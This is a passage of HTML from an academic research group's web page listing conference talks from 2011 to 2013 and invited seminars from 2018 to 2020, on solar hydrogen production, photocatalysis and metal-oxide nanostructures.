(MS&T), Symposium on Optical Nanomaterials for Photonics/Biophotonics, Montreal, Quebec,
Canada,
October 2013
</li>
<li>
<u><strong>J.W. Shi</strong></u>, <strong>L.J. Guo</strong>, “<strong>Design and
structure-activity relationships of novel ABO<sub>3</sub> structure-based visible-light-driven
photocatalysts</strong>”, Materials Science & Technology 2013 Conference &
Exhibition,
Montreal, Quebec, Canada, October 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Metal Oxide or Metal
Nanodots Decorated g-C<sub>3</sub>N<sub>4</sub> for Efficient Photocatalytic Hydrogen
Production</strong>”, Materials Science & Technology 2013 Conference & Exhibition,
Montreal, Quebec, Canada, October 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Core/Shell Structured
Hematite Nanorod Arrays as Photoanodes for Efficient Solar Water Oxidation</strong>”,
IUPAC
9th International Conference on Novel Materials and their Synthesis (NMS-IX) & 23rd
International Symposium on Fine Chemistry and Functional Polymers (FCFP-XXIII), Shanghai, China,
October 2013
</li>
<li>
<strong>J.Z. Su </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>WO<sub>3</sub>-based nano-wire arrays heterojunction and their
photoelectrochemical
hydrogen production performance</strong>”, 14<sup>th</sup> National Youth Science and
Technology Materials Seminar, Shenyang, China, October 2013
</li>
<li>
<strong><u>M.C. Liu</u></strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>D.W. Jing</strong>, <strong>Z.H.
Zhou</strong>, <strong>L.J. Guo</strong>, “<strong>Twin-induced homojunctions for efficient
solar
hydrogen generation</strong>”, 4<sup>th</sup> China-Australia Symposium for Materials Science,
Zhuhai, China, October 20-24, 2013
</li>
<li>
<strong>I. Zegkinoglou</strong>, “<strong>New Materials for Solar Energy Conversion:
Interface
Studies with Soft X-Ray Spectroscopy</strong>”, 2013 Advanced Light Source User Meeting,
Workshop on Soft X-Ray Spectroscopy of Heterogeneous Interface, Lawrence Berkeley National
Laboratory, Berkeley, CA, October 2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>All-oxide Quantum-confined
Hetero-Nanostructures for Solar Hydrogen Generation by Water Splitting</strong>”,
3<sup>rd </sup>Annual World Congress of Nano Science & Technology, Symposium on
Nanotechnology
in Energy & Environment, Qujiang International Conference Center, Xi'an, China, September
2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong class="blue_color">Keynote lecture & Session chair</strong>)</span>,
“<strong>Quantum-confined oxide heteronanostructures for solar hydrogen
generation</strong>”,
1<sup>st</sup> International Workshop on Nanotechnology, Renewable Energy & Sustainability
(NRES), Xi’an, China, September 2013
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>Electricity and Hydrogen Co-production from A
Bio-Electrochemical Cell with Acetate Substrate</strong>”, 3<sup>rd</sup> New Energy
Forum-2013 with the theme of “From Green Dream to Reality”, Xian, China, September
2013
</li>
<li>
<strong>D.W. Jing </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Experimental and
numerical
study on the solar photocatalytic hydrogen production reactor</strong>”, 3<sup>rd</sup>
New
Energy Forum-2013, Xi’an, China, September 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Doped Hematite
Nanostructures for Solar Water Oxidation</strong>”, Workshop on “Alternative Energy
Solutions and Sustainable Growth”, New Delhi, India, September 2013
</li>
<li>
<u><strong>Y.M. Fu</strong></u>,<strong> L. Zhao</strong>, <strong>S.H. Shen</strong>,
“<strong>Enhancement of Photoelectrochemical Performance by Doping Tantalum Ions in
Hematite
(α-Fe<sub>2</sub>O<sub>3</sub>) Nanorod Photoanodes</strong>”, International Conference on
Nanoscience & Technology, Beijing, China, September 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Keynote
lecture & Session chair</strong>)</span>, “<strong>Quantum-confined oxide
heteronanostructures
for solar hydrogen generation</strong>”, 8<sup>th</sup> International
Conference on High Temperature Ceramic Matrix, Symposium S3 on Nanocomposite Materials
& Systems, Xi'an, China, September 2013
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Guo</strong>, “<strong>Novel
ABO<sub>3</sub>-based
photocatalysts for visible-light-driven water splitting</strong>”, 8<sup>th</sup>
International Conference on High Temperature Ceramic Matric Composites (HTCMC-8), Xi'an, China,
September 2013
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>L.J. Guo</strong>, “<strong>Different Metal
Element
Doped Hematites and Their Electronic Characterizations for Solar Water Splitting
Application</strong>”, 8<sup>th</sup> International Conference on High Temperature Ceramic
Matrix Composites (HTCMC-8), Xi'an, China, September 2013
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Metal oxide QDs enabled efficient photocatalytic
hydrogen
generation over g-C<sub>3</sub>N<sub>4</sub> under visible light</strong>”, 8<sup>th</sup>
International Conference on High Temperature Ceramic Matrix Composites (HTCMC-8), Xi'an, China,
September 2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong class="blue_color">Invited talk & Session chair</strong>)</span>,
“<strong>On quantum confinement effects in large bandgap semiconductors</strong>”, SPIE Optics
&
Photonics, Symposium on Solar Hydrogen & Nanotechnology VIII, San Diego, CA, August 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Quantum-confined oxide
heteronanostructures for solar hydrogen generation</strong>”, 2013 CMOS Emerging Technologies
Research Symposium, Whistler, BC, Canada, July 2013
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>TiO<sub>2</sub> photocathode coupling with bio-anode
for
electricity and hydrogen co-production</strong>”, 5<sup>th</sup> International Conference
on
Applied Energy, Pretoria, South Africa, July 2013
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Zr-doped α-Fe<sub>2</sub>O<sub>3</sub> photoanodes
for
efficient solar water splitting</strong>”, 11<sup>th</sup> International Conference on
Materials Chemistry (MC11), University of Warwick, UK, July 2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Quantum confinement and interfacial
electronic structure effects for efficient solar hydrogen generation</strong>”, 7<sup>th </sup>International
Conference on Materials for Advanced Technology (ICMAT), Symposium D on Nanostructure Materials
for
Solar Energy Conversion, Suntec, Singapore, June-July 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited talk & Session chair</strong>)</span>,
“<strong>On quantum confinement effects and interfacial electronic structure engineering
for
efficient solar hydrogen generation</strong>”,10<sup>th</sup> PACRIM conference on
Ceramic & Glass Technology,<br>Symposium 7 on Multifunctional Metal Oxide Nanostructures and
Heteroarchitectures for Energy and Device Applications, San Diego, CA, USA, June 2013
</li>
<li>
<strong> <u>S.H. Shen</u></strong>, <strong>J. Chen</strong>, <strong>Z. Liu</strong>, <strong>L.J.
Guo</strong>, “<strong>Creating active sites in mesostructure of MCM-41 for efficient
photocatalytic hydrogen generation under visible light</strong>”, The 10<sup>th</sup>
Pacific
Rim Conference on Ceramic and Glass Technology including GOMD 2013 - Glass & Optical
Materials
Division Annual Meeting, San Diego, CA, USA, June 2013
</li>
<li>
<strong>J.J. Wei</strong>, “<strong>Selection of surface reflectivity for a solar cavity
receiver</strong>”, The Asian Symposium on Computational Heat Transfer and Fluid
Flow-2013,
Hong Kong, June 2013
</li>
<li>
<u><strong>I. Zegkinoglou</strong></u> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,
C. X. Kronawitter, X. Feng, J.H Guo, D. Wang, S. S. Mao, F. J.
Himpsel, <strong>L.Vayssieres</strong>, “<strong>Electronic Structure of Hematite
Photoanodes for Efficient Solar Water Splitting: A Soft X-Ray Spectroscopy Study</strong>”,
2013 Spring Meeting of the Materials Research Society (MRS), Symposium Z on Nanotechnology &
Sustainability, San Francisco, CA, USA, April 2013
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>J.G. Jiang</strong>, Coleman X.
Kronawitter,<strong> P.H. Guo</strong>, <strong>L.J. Guo</strong>, S. S. Mao,
“<strong>TiO<sub>2</sub><sub> </sub>Modified α-Fe<sub>2</sub>O<sub>3</sub> Nanorod Arrays
for
Efficient Solar Water Splitting</strong>”, 2013 MRS Spring Meeting & Exhibit, YY:
Titanium
Dioxide-Fundamentals and Applications Symposium, San Francisco, CA, USA, April 2013
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>J.G Jiang</strong>, <strong>P.H. Guo</strong>,
Coleman X.
Kronawitter, <strong>L.J. Guo</strong>, S. S. Mao, “<strong>Aqueous solution growth of
Pt-doped hematite photoanodes for efficient water splitting</strong>”, Colloids &
Energy
Conference 2013, Xiamen, China, April 2013
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Doped Hematite Nanorod
Arrays for Enhanced Solar Water Splitting</strong>”, NANOSMAT-Asia, Wuhan, China, March
2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Quantum-confined
oxide heteronanostructures for solar hydrogen generation</strong>”, 6<sup>th </sup>International
Conference on Advanced Materials & Nanotechnology, Auckland, New Zealand, February 2013
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2012 (43)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="50">
<li>
<strong>E. Traversa </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Towards the Next Generation of Solid
Oxide
Fuel Cells Operating at 600°C with Chemically Stable Proton Conducting Electrolytes</strong>”,
Symposium on Advanced Materials for Applications in Energy, Health, Electronics and Photonics,
Varennes, Quebec, Canada, November 30, 2012
</li>
<li>
<strong>E. Traversa</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>Ionic Conductivity of Oxide Thin Films
and
Superlattices</strong>”, Materials Research Society Fall 2012 Meeting, Symposium F: Oxide
Thin
Films for Renewable Energy Applications/Symposium I: Functional Materials for Solid Oxide Fuel
Cells, Boston, MA, USA, November 25-30, 2012
</li>
<li>
<strong>B. Chen</strong> <span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>,
“<strong>Doped Particle Semi-implicit Method Based on Large Eddy Simulation</strong>”,
The 4<sup>th</sup> International Conference on Computational Methods, Gold Coast, QLD,
Australia,
November 2012
</li>
<li>
<u>F. J. Himpsel</u> <span class="invited">(<strong>Invited</strong>)</span>, J. Guo, W.
Yang,
Z. Hussain, <strong>L. Vayssieres</strong>, “<strong>Using Spectroscopy for Designing
New
Types of Solar Cells</strong>”, 2012 X-ray Scattering Principal Investigators' Meeting,
Division of Materials Sciences & Engineering, Office of Basic Energy Sciences, U.S.
Department
of Energy, Washingtonian Marriott, Gaithersburg, MD, November 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Keynote lecture & Session chair</strong>)</span>,
“<strong>All-oxide heteronanostructures for solar hydrogen generation</strong>”,
6<sup>th </sup>International
Workshop on Advanced Materials Science & Nanotechnology, Halong Bay, Vietnam,
October-November
2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Low cost metal oxide
heteronanostructures for renewable energy</strong>”, The 12<sup>th </sup>International
Conference on Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong> E. Traversa</strong> <span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Towards the Next Generation of
Solid
Oxide Fuel Cells Operating at 600°C with Chemically Stable Proton Conducting
Electrolytes</strong>”,
The 12<sup>th</sup>International Conference on Clean Energy (ICCE-2012), Xi’an, China,
October
26-30, 2012
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Boiling
Coal in Water</strong><strong>— H<sub>2</sub> production and power generation system with near
zero
CO<sub>2</sub> emission based coal and supercritical water gasification</strong>”, The
12<sup>th</sup>
International Conference on Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Plenary</strong>)</span>, “<strong>Facile Aqueous Growth of
Hematite Photoanodes for Solar Water Splitting</strong>”, The 12<sup>th</sup>
International
Conference on Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>Co-production of electricity and hydrogen from
microbial
fuel cell</strong>”, The 12<sup>th</sup> International Conference on Clean Energy
(ICCE-2012),
Xi'an, China, October 26-30, 2012
</li>
<li>
<strong><u>J. Chen</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Enhanced photocatalytic hydrogen evolution over Cu-doped
g-C<sub>3</sub>N<sub>4</sub>
under visible light irradiation [C]</strong>”, The 12<sup>th</sup> International
Conference on
Clean Energy (ICCE-2012), Xi’an, China, October 26-30, 2012
</li>
<li>
<strong><u>P. Wu</u></strong>, <strong>J. Chen</strong>, <strong>L.J. Guo</strong>,
“<strong>Effect
of Silicon on Graphitic Carbon Nitride for Visible-light-Driven Photocatalytic Hydrogen
Evolution</strong>”, The 12<sup>th</sup> International Conference on Clean Energy
(ICCE-2012),
Xi’an, China, October 26-30, 2012
</li>
<li>
<strong> L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Aqueous
design of quantum-confined oxide heteronanostructures</strong>”, 8<sup>th</sup> IUPAC
International Conference on New Materials & their Synthesis, Xi’an, China, October
14-19,
2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>All-oxide quantum-confined hetero
nanostructures for solar hydrogen generation</strong>”, 222<sup>nd</sup> ECS Fall Meeting,
Symposium B10: Renewable Fuels from Sunlight& Electricity, Honolulu, October 2012
</li>
<li>
<strong>E. Traversa</strong> <span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Towards the Next Generation of
Solid
Oxide Fuel Cells Operating at 600°C with Chemically Stable Proton Conducting
Electrolytes</strong>”,
Euro-mediterranean Hydrogen Technologies Conference-EmHyTeC 2012, Hammamet, Tunisia, September
11-14, 2012
</li>
<li>
<strong>J.Z. Su</strong> <span class="invited">(<strong>Invited</strong>)</span>,“<strong>Hydrogen
Production by Photocatalytic and Photoeletrochemical Methods</strong>”, Sino-German
Workshop
on Energy Research, Xi'an China, September 2012
</li>
<li>
<strong>H. Jin </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Hydrogen production by supercritical water gasification driven by concentrated
solar
energy</strong>”, Sino-German Workshop on Energy Research, Xi'an, China, September 2012
</li>
<li>
<strong>X.W. Hu </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Hydrogen Bubble during Photocatalysis</strong>”, Sino-German Workshop on
Energy
Research, Xi'an, China, September 2012
</li>
<li>
<strong>H. Jin </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Hydrogen production by supercritical water gasification</strong>”,
Sino-German
Workshop on Energy Research, Xi'an, China, September 2012
</li>
<li>
<strong>E. Traversa </strong><span
class="invited">(<strong>Invited</strong>)</span>,“<strong>Ionic
Conductivity of Oxide Thin Films and Superlattices</strong>”, XI International Conference
on
Nanostructured Materials NANO 2012, Rhodes, Greece, August 26-31, 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited talk & Session chairs</strong>)</span>,
“<strong>All-oxide hetero nanostructures for direct solar water splitting</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology VII, San Diego,
CA,
USA, August 11-16, 2012
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>L.J. Guo</strong>, “<strong>1D metal oxide
nanowire
array synthesis and photoelectrochemical application</strong>”, SPIE Optics &
Photonics,
Symposium on Solar Hydrogen & Nanotechnology VII, San Diego, CA, USA, August 11-16, 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>All-oxide hetero nanostructures
for
solar water splitting</strong>”,244<sup>th</sup> American Chemical Society National
Meeting
& Exposition, 4<sup>th</sup>International Symposium on Hydrogen from Renewable Sources and
Refinery Applications, Philadelphia, PA, USA, August 2012
</li>
<li>
<strong>D.W. Jing </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Photocatalytic Hydrogen
Production
under visible light over TiO<sub>2</sub> calcined in different Gas Atmospheres</strong>”,
XXI
International Materials Research Congress, Cancun, Mexico, August 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Enhanced Performance for Water
Splitting over Ti-doped Hematite Photoanodes</strong>”, XXI International Materials
Research
Congress, Cancun, Mexico, August 2012
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Guo</strong>, “<strong>Tin(II) antimonates
with
adjustable compositions: Bandgap and nanostructure control for visible-light-driven
photocatalytic
H<sub>2</sub>
evolution</strong>”, XXI International Materials Research Congress, Cancun, Mexico, August
2012
</li>
<li>
<strong><u>Y. Liu</u></strong>, <strong>J.G. Jiang</strong>, <strong>M.T. Li</strong>, <strong>L.J.
Guo</strong>, “<strong>Photoelectrochemical performance of cds nanorods grafted on
vertically
aligned Tio<sub>2</sub> nanorods</strong>”, XXI International Materials Research Congress,
Cancun, Mexico, August 2012
</li>
<li>
<strong>L.Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Quantum-confined metal oxide
hetero-nanostructures for clean energy</strong>”, 20<sup>th</sup> International Conference
on
Composites/Nano Engineering, Beijing, China, July 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>All oxide hetero-nanostructures
for
clean energy</strong>”, 2<sup>nd</sup> International Defense Nanotechnology Application
Center
Symposium on Nanotechnology, Yonsei University, Seoul, Korea, July 2012
</li>
<li>
<strong> L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited talk & Session chair</strong>)</span>,
“<strong>Aqueous design of quantum-confined metal oxide arrayed thin films</strong>”,
6<sup>th</sup> International Conference on Technological Advances of Thin Films & Surface
Coatings, Symposium on Oxide Thin Films & Nanostructures, Singapore, July 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Panel discussion Chair/Symposiarch</strong>)</span>,
International Union of Materials Research Societies, International Conference of Young
Researchers
on Advanced Materials, Symposium on Energy & Environment, Session on Hydrogen generation
&
Storage, Singapore, July 2012
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>Surfactant’s Effect on the Photoactivity of
Fe-doped TiO<sub>2</sub></strong>”, 2012 Chinese Materials Conference, Taiyuan, China,
July
2012
</li>
<li>
<strong>D.W. Jing</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, <strong>L.J. Guo</strong>, “<strong>Photocatalytic
hydrogen production under direct solar light: materials preparation, system optimization and
pilot
demonstration</strong>”, 4<sup>th</sup> Sino-Thai Workshop on Renewable Energy, Tianjin,
May
2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Aqueous design of
quantum-confined
metal oxide hetero-nanostructures</strong>”, 2012 MRS Spring Meeting, Cluster on
Nanostructured materials and devices, Symposium BB: Solution Synthesis of Inorganic Films and
Nanostructured Materials, San Francisco, CA, USA, April 2012
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>The
photocatalytic activity of Cd<sub>0.5</sub>Zn<sub>0.5</sub>S/TNTs (titanate nanotubes)
synthesized
by a two-step hydrothermal method</strong>”, Working Group Meeting for Discussing Green
Innovation Initiatives Especially on Renewable Energy, Bonn, Germany, March 2012
</li>
<li>
<strong>Y.J. Lv </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Solar hydrogen production by biomass gasification in supercritical water:
Hydrogen
production and hydrodynamics characteristics in supercritical water fluidized bed</strong>”,
243<sup>rd</sup> ACS National Meeting & Exposition, March 2012
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Nanostructure
and Nanoheterojuction for High-Efficiency Photocatalytic and Photoelectrochemical Water
Splitting</strong>”, 36<sup>th</sup> International Conference and Exposition on Advanced
Ceramics and Composites, Daytona Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Surface doping of W<sup>6+</sup>
for
enhanced photoelectrochemical water splitting over α-Fe<sub>2</sub>O<sub>3</sub> nanorod
photoanodes</strong>”,
36<sup>th</sup> International Conference and Exposition on Advanced Ceramics and Composites,
Daytona
Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Enhanced charge separation for high efficiency
photocatalytic hydrogen production</strong>”, 36<sup>th</sup> International Conference and
Exposition on Advanced Ceramics and Composites, Daytona Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong><u>J.W. Shi</u></strong>, J.H. Ye, <strong>L.J. Ma</strong>, S.X. Ouyang, <strong>D.W.
Jing</strong>, <strong>L.J. Guo</strong>, “<strong>Upconversion luminescent Er doped
SrTiO<sub>3</sub>: Site-selected substitution and visible-light-driven photocatalytic
H<sub>2</sub>
or O<sub>2</sub> evolution</strong>”, 36<sup>th</sup> International Conference and
Exposition
on Advanced Ceramics and Composites, Daytona Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Low cost all-oxide
hetero-nanostructures for direct solar water splitting</strong>”, 2012 US-Vietnam Workshop
on
Solar Energy Conversion, Ho Chi Minh City, Vietnam, January 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Facile Aqueous Growth of Hematite
Photoanodes for Solar Water Splitting</strong>”, 12<sup>th</sup> International Conference
on
Clean Energy, Xi’an, China, January 2012
</li>
<li>
<strong>Q.Y. Chen </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Co-production of
electricity
and hydrogen from microbial fuel cell</strong>”, 12<sup>th</sup> International Conference
on
Clean Energy, Xi’an, China, January 2012
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2011 (7)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="7">
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Single-crystal
nanosheet-based hierarchical AgSbO<sub>3</sub> with exposed {001} facets: topotactic synthesis
and
enhanced photocatalytic activity</strong>”, 3<sup>rd </sup>China-Australia Symposium for
Materials Science, Gold Coast, Queensland, Australia, November 2011
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Ma</strong>, <strong>P. Wu</strong>, <strong>Z.H.
Zhou</strong>, <strong>P.H. Guo</strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>A Novel Sn<sub>2</sub>Sb<sub>2</sub>O<sub>7</sub> Nanophotocatalyst for
Visible-light-driven H<sub>2</sub> Evolution</strong>”, 3<sup>rd</sup> China-Australia
Symposium for Materials Science, Gold Coast, Queensland, Australia, November 2011
</li>
<li>
<strong><u>P. Wu</u></strong>, <strong>Z.H. Zhou</strong>, <strong>J.W. Shi</strong>,
“<strong>First-principles calculations of Cd<sub>1-x</sub>Zn<sub>x</sub>S doped with
alkaline
earth metals for photocatalytic hydrogen generation</strong>”, 12<sup>th</sup> National
Hydrogen Energy Conference and 4<sup>th</sup> Hydrogen Seminar of the three geographic areas,
Wuhan,
China, October 2011
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>High-Efficiency
Solar Driven Photocatalytic Water Splitting for Hydrogen Generation: on Design concepts
Catalytic
Materials and Pilot-Scale Demonstration</strong>”, 9<sup>th</sup> International Meeting of
Pacific Rim Ceramic Societies, Cairns, North Queensland, Australia, July 2011
</li>
<li>
<strong><u>J.W. Shi</u></strong>, J.H. Ye, Q.Y. Li, <strong>P.H. Guo</strong>, G.C. Xi, <strong>L.J.
Guo</strong>, “<strong>Self-templated synthesis of single-crystal AgSbO<sub>3</sub>
nanosheets
for visible-light-driven photocatalytic O<sub>2</sub> evolution</strong>”, 9<sup>th</sup>
International Meeting of Pacific Rim Ceramic Societies, Cairns, North Queensland, Australia,
July
2011
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Solar to Hydrogen”-From Concepts Design of Advanced</strong>”,
2<sup>nd</sup> International Workshop on Renewable Energy, July 2011
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Surface Modification of α-Fe<sub>2</sub>O<sub>3</sub>
Nanorod Array Photoanodes for Improved Light-Induced Water Splitting</strong>”, 2011 MRS
Spring Meeting and Exhibit, Symposium F: Renewable Fuels and Nanotechnology, San Francisco, USA,
April 2011
</li>
</ol>
</div>
<div id="divseminars">
<h3 align="center">
<strong><a id="seminars"></a>Seminars</strong> <span class="listcount">(68)</span></h3>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="68">
<li>
<strong>L. Vayssieres</strong>, <strong>McGill University</strong>, Department of Materials
Engineering, <strong>Host: Prof. K. H. Bevan</strong>, Montreal, Canada, May 15, 2020
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>CNRS-Lasers</strong>, <strong>Plasmas & Photonics
Processes
Laboratory (LP3)</strong>, <strong>Host: Prof. A. Kabashin</strong>, Marseille, France, January
22,
2020
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Institut d'Electronique, de Microelectronique et de
Nanotechnologie (IEMN)</strong>, <strong>Host: Prof. E. Dogheche</strong>, Villeneuve d'ascq,
France, January 14, 2020
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Northwestern Polytechnic University</strong>, Institute
for
Flexible Electronics, <strong>Host: Prof. I. Perepichka</strong>, Xi'an, China, December 3, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Seoul National University</strong>, Center for
Nanoparticle
Research, Institute for Basic Science, <strong>Host: Prof. T. Hyeon</strong>, Seoul, Korea,
November
15, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Emory University</strong>, Emory Renewable Energy
Research &
Education Consortium, Department of Chemistry, <strong>Host: Prof. T. Lian</strong>, Atlanta,
GA,
USA, October 18, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Chang’an University</strong>, Chemical Engineering &
Technology, School of Environmental Science & Engineering, HongXue Lecture Series, <strong>Host:
Prof. Z. Zhou</strong>, Xi'an, China, March 13, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Center for Research & Advanced Studies of the National
Polytechnic Institute (CINVESTAV)</strong>, Department of Applied Physics, <strong>Host: Prof.
G.
Oskam</strong>, Merida, Yucatan, Mexico, February 25, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Ecole Polytechnique Federale de Lausanne (EPFL)</strong>,
Laboratory of Renewable Energy Science & Engineering, <strong>Host: Prof. S. Haussener</strong>,
Lausanne, Switzerland, December 21, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of California Santa Cruz</strong>, Department
of
Chemistry & Biochemistry, <strong>Host: Prof. Y. Li</strong>, Santa Cruz, CA, USA, October 31,
2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Shaanxi University of Science & Technology</strong>,
Frontier Institute of Science & Technology, School of Environmental Science & Engineering,
<strong>Host: Prof. C. Y. Wang</strong>, Xi'an, China, October 18, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>National University of Singapore</strong>, Department of
Mechanical Engineering, <strong>Host: Prof. L. Lu</strong>, Singapore, July 26, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Yale University</strong>, School of Engineering &
Applied
Sciences, Department of Chemical & Environmental Engineering Seminar Series, <strong> Host:
Prof. S.
Hu</strong>, New Haven, CT, USA, April 25, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Lawrence Berkeley National Laboratory</strong>, Energy
Storage & Distributed Resources Division, Energy Technologies Area, Berkeley Electrochemistry
Seminar Series, <strong> Host: Dr. R. Kostecki</strong>, Berkeley, CA, USA, April 16, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>California Institute of Technology</strong>, Joint
Center
for Artificial Photosynthesis, JCAP Seminar Series,<strong> Host: Dr. C. X. Xiang</strong>,
Pasadena, CA, USA, March 27, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of California Davis</strong>, College of
Engineering, <strong> Host: Prof. S. Islam</strong>, Kemper Hall, Davis, CA, USA, February 28,
2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of California Berkeley</strong>, Renewable
and
